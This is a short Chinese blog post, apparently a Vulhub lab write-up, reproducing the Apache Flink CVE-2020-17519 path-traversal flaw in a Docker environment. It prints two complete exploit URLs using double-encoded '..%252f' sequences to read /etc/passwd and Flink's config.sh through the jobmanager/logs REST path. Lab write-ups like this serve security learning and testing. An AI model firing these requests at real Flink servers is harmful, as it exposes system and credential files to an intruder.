学习Vulhub的ApacheFlinkjobmanager/lo...

信息安全不简单鸭 2024-07-21 01:28:31

Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力,大数据态势感知关联分析规则经常会用到该技术。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。[1]

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明Apache Flink jobmanager/logs 路径穿越 (CVE-2020-17519)环境搭建成功了

直接体验目录穿越,任意文件读取,其中%25%2f等价于%2f,URL解码后是/

http://144.34.162.13:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

说是任意文件读取,那么读取网站代码,网站配置文件,就会有很大的风险了

http://144.34.162.13:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fopt%252fflink%252fbin%252fconfig.sh

参考^Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519) https://vulhub.org/#/environments/flink/CVE-2020-17519/
0 阅读:0

信息安全不简单鸭

简介:感谢大家的关注